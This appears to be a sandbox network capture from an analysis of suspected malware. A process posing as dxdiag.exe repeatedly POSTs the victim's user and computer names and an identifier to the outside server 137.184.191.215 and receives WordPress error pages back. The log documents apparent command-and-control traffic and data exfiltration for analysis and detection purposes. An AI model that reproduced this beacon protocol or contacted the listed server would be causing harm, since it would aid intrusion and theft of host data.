                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:10.771218061 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                      Oct 1, 2024 07:45:10.771231890 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                      Oct 1, 2024 07:45:10.771253109 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.749722137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:10.933406115 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:10.938339949 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:13.525670052 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:11 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:13.525686979 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:13.525698900 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.749723137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:13.690340042 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:13.695208073 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:16.261729002 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:14 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:16.261746883 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:16.261758089 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.749724137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:16.439589024 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:16.444407940 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:19.036267042 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:16 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:19.036313057 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                      Oct 1, 2024 07:45:19.036369085 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                      Oct 1, 2024 07:45:19.036406994 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.749725137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:19.188193083 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:19.193169117 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:21.752849102 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:19 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:21.752916098 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:21.752955914 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.749726137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:21.901089907 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:21.906100035 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:24.487451077 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:22 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
